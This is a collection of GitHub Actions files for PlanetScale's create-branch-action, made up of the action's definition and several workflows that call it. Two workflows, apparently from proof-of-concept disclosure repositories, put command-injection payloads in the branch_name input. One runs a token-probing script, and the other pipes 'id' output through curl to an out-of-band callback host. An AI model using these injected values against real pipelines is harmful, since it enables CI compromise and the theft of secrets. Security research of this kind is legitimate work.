planetscale/create-branch-action/action.yaml
name: 'Create Database Branch '
description: 'Creates a branch for a PlanetScale database.'
branding:
  color: 'orange'
  icon: 'database'
inputs:
  database_name:
    description: 'The name of the database'
    required: true
  branch_name:
    description: 'The name of the new branch'
    required: true
  org_name:
    description: 'The name of the organization that owns the database'
    required: true
  from:
    description: 'The production branch to create the new branch from. Defaults to the default production branch.'
    required: false
  restore:
    description: 'The ID of the backup you wish to restore into the new branch.'
    required: false
  region:
    description: 'The region where the new branch should be created. Defaults to the region of the `from` branch.'
    required: false
  wait:
    description: 'If set to "true", the action will wait until the branch is finished initializing before exiting.'
    required: false
  check_exists:
    description: "If set to \"true\", the action won't create the branch if it already exists."
    required: false
  seed_data:
    description: "Set to \"true\", to enable seed data from the latest backup using Data Branching™"
    required: false
runs:
  using: 'docker'
  image: 'Dockerfile'
  args:
    - ${{ inputs.database_name }}
    - ${{ inputs.branch_name }}
    - ${{ inputs.org_name }}
    - ${{ inputs.from }}
    - ${{ inputs.restore }}
    - ${{ inputs.region }}
    - ${{ inputs.wait }}
    - ${{ inputs.check_exists }}
    - ${{ inputs.seed_data }}

palmgrove/ps-action-poc/.github/workflows/poc4.yml
- name: create-branch-action token probe
  uses: planetscale/create-branch-action@allow-duplicates
  continue-on-error: true
  with:
    org_name: "poc-org"
    database_name: "pocdb"
    branch_name: 'x$(sh /github/workspace/probe2.sh tok)end'
    check_exists: "false"

ettorepuccetti/terrarossa/.github/workflows/db-deploy-request.yml
- name: Create a branch
  uses: planetscale/create-branch-action@v4
  id: create_branch
  with:
    org_name: ${{ secrets.PLANETSCALE_ORG_NAME }}
    database_name: ${{ secrets.PLANETSCALE_DATABASE_NAME }}
    branch_name: ${{ env.PSCALE_BRANCH_NAME }}
    from: main
    check_exists: true
    wait: true

ugbodagadave/ps-action-cmd-injection-poc/.github/workflows/poc.yml
- name: create-branch-action injection probe
  uses: planetscale/create-branch-action@allow-duplicates
  continue-on-error: true
  with:
    org_name: "poc-org"
    database_name: "pocdb"
    branch_name: 'x$(id|curl${IFS}-d${IFS}@-${IFS}dar9fvophf83v5htebf0opnziqr186ggf.oast.online)'
    check_exists: "true"

nathanjreese/nathanjreese.github.io/.github/workflows/main.yml
- name: Create Database Branch 
  uses: planetscale/create-branch-action@v4
  with:
    database_name: indycar
    branch_name: mynewbranch
    org_name: nathanjreese
    from: main